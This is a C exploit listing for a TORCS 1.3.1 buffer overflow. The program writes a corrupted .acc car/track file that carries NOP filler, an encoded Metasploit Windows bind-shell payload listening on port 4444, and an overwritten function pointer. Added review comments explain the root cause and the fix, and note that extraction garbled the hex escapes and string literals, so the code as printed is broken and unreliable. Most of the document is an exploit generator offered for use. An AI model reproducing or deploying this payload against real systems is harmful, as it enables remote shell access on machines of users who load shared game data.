
# Title : TORCS 1.3.1 acc Buffer Overflow
# Published : 2011-12-20
# Author :


/* Exploit Title: TORCS acc Buffer Overflow
# Date: 20/12/2011
# Author: Andres Gomez
# Software Link: http://torcs.sourceforge.net/
# Version: torcs 1.3.1
# Tested on: Windows
# CVE : */

/*
    This exploit generates a corrupted acc file 
    which has to be saved in the directories where
    TORCS loads its data, for example replace 
    cars/car4-trb1/car4-trb1.acc and put test.acc or create 
    a new car/track and select it in the TORCS menu
*/


#include <stdio.h>
#include <stdlib.h>

/*
   Shellcode: windows/shell_bind_tcp LPORT=4444 -b 'x00xffx0a'
   Encoder: x86/shikata_ga_nai
*/

/*
 * Payload bytes that main() writes verbatim into the generated .acc file.
 * Per the comment above this is a Metasploit windows/shell_bind_tcp payload
 * listening on TCP 4444, passed through the shikata_ga_nai encoder with NUL
 * among the excluded bytes -- it has to survive fprintf's "%s", which stops
 * at the first NUL. For defenders the bind listener is the observable
 * artifact: an unexpected TCP/4444 listener (presumably owned by the game
 * process) on a host that has loaded third-party car or track data.
 * NOTE(review): the hex escapes in this listing have been garbled by
 * extraction ("xbd" where a "\x.." escape is expected), so the literal as
 * printed is plain ASCII text and does not encode the intended byte values.
 */
unsigned char buf[] = 
"xbdx2exedxb6x2dxddxc2xd9x74x24xf4x5ex2bxc9xb1"
"x56x83xeexfcx31x6ex0fx03x6ex21x0fx43xd1xd5x46"
"xacx2ax25x39x24xcfx14x6bx52x9bx04xbbx10xc9xa4"
"x30x74xfax3fx34x51x0dx88xf3x87x20x09x32x08xee"
"xc9x54xf4xedx1dxb7xc5x3dx50xb6x02x23x9axeaxdb"
"x2fx08x1bx6fx6dx90x1axbfxf9xa8x64xbax3ex5cxdf"
"xc5x6excocx54x8dx96x67x32x2exa6xa4x20x12xe1xc1"
"x93xe0xf0x03xeax09xc3x6bxa1x37xebx66xbbx70xcc"
"x98xcex8ax2ex25xc9x48x4cxf1x5cx4dxf6x72xc6xb5"
"x06x57x91x3ex04x1cxd5x19x09xa3x3ax12x35x28xbd"
"xf5xbfx6ax9axd1xe4x29x83x40x41x9cxbcx93x2dx41"
"x19xdfxdcx96x1bx82x88x5bx16x3dx49xf3x21x4ex7b"
"x5cx9axd8x37x15x04x1ex37x0cxf0xb0xc6xaex01x98"
"x0cxfax51xb2xa5x82x39x42x49x57xedx12xe5x07x4e"
"xc3x45xf7x26x09x4ax28x56x32x80x5fx50xfcxf0x0c"
"x37xfdx06xa3x9bx88xe1xa9x33xddxbax45xf6x3ax73"
"xf2x09x69x2fxabx9dx25x39x6bxa1xb5x6fxd8x0ex1d"
"xf8xaax5cx9ax19xadx48x8ax50x96x1bx40x0dx55xbd"
"x55x04x0dx5exc7xc3xcdx29xf4x5bx9ax7excax95x4e"
"x93x75x0cx6cx6exe3x77x34xb5xd0x76xb5x38x6cx5d"
"xa5x84x6dxd9x91x58x38xb7x4fx1fx92x79x39xc9x49"
"xd0xadx8cxa1xe3xabx90xefx95x53x20x46xe0x6cx8d"
"x0exe4x15xf3xaex0bxccxb7xdfx41x4cx91x77x0cx05"
"xa3x15xafxf0xe0x23x2cxf0x98xd7x2cx71x9cx9cxea"
"x6axecx8dx9ex8cx43xadx8a";

// this points to your shellcode
// Four bytes appended immediately after the payload; per the author's note
// above they hold the address the corrupted pointer is made to reference.
// The value is specific to the build the author tested ("Tested on: Windows")
// and, like buf, its hex escapes are garbled in this listing.
unsigned char function_pointer [] = "xA8xCAx0Ex10";

/*
 * Writes "test.acc" in the current directory: an AC3D-format model file
 * whose MATERIAL record carries an over-long quoted name -- 607 filler
 * bytes, then the payload bytes, then function_pointer -- followed by a
 * minimal OBJECT record. Per the title, the TORCS 1.3.1 loader overflows a
 * buffer while handling that name; the buffer itself is not shown here.
 * Defender's view: the root cause is an unbounded read of a name field from
 * an untrusted data file. The fix is a length-checked copy (or rejecting
 * names longer than the destination) in the .acc loader, and .acc content
 * obtained from third parties should be treated as untrusted input.
 *
 * argc/argv are unused. Returns 0 on success, -1 if the output file cannot
 * be opened.
 * NOTE(review): several string literals below have lost their backslash
 * escapes in extraction (e.g. "AC3Dbn", and the "rgb ..." line is no longer
 * a single literal), so this listing does not compile as printed.
 */
int main(int argc, char **argv) {

    FILE *save_fd;
    int i=0;

    save_fd = fopen("test.acc", "w");

    if (save_fd == NULL) {
        // Reports to stdout without a trailing newline; writing to stderr
        // and calling perror() would also show why fopen failed.
	    printf("Failed to open '%s' for writing", "test.acc");
	    return -1;
    }

    // AC3D header line, then the start of a MATERIAL record whose quoted
    // name is the field the loader copies.
    fprintf(save_fd, "AC3Dbn");
    fprintf(save_fd, "MATERIAL "");
    // 607 filler bytes pad the name past the end of the loader's buffer.
    // As printed, 'x90' is a multi-character constant whose int value is
    // implementation-defined; putc() writes only its low byte.
    for(i=0; i < 607; i++) {
    	putc('x90', save_fd);
    }
    // "%s" copies buf and function_pointer only up to their first NUL,
    // which is why the payload was encoded with 0x00 excluded (see the
    // comment above buf). The rest of the line is ordinary AC3D material
    // attributes.
    fprintf(save_fd, "%s%s" rgb 0.4 0.4 0.4  amb 0.8 0.8 0.8  emis 0.4 0.4 0.4  spec 0.5 0.5 0.5  shi 50  trans 0n", buf, function_pointer);
    fprintf(save_fd, "OBJECT worldn");
    fprintf(save_fd, "kids %dn", 5);

    // BUG: close() is the POSIX file-descriptor call and takes an int, not a
    // FILE*; this should be fclose(save_fd), whose return value should be
    // checked on a write stream. No header declaring close() is included
    // either. The data still reaches disk only because a normal return from
    // main flushes open stdio streams.
    close(save_fd);

    return 0;
}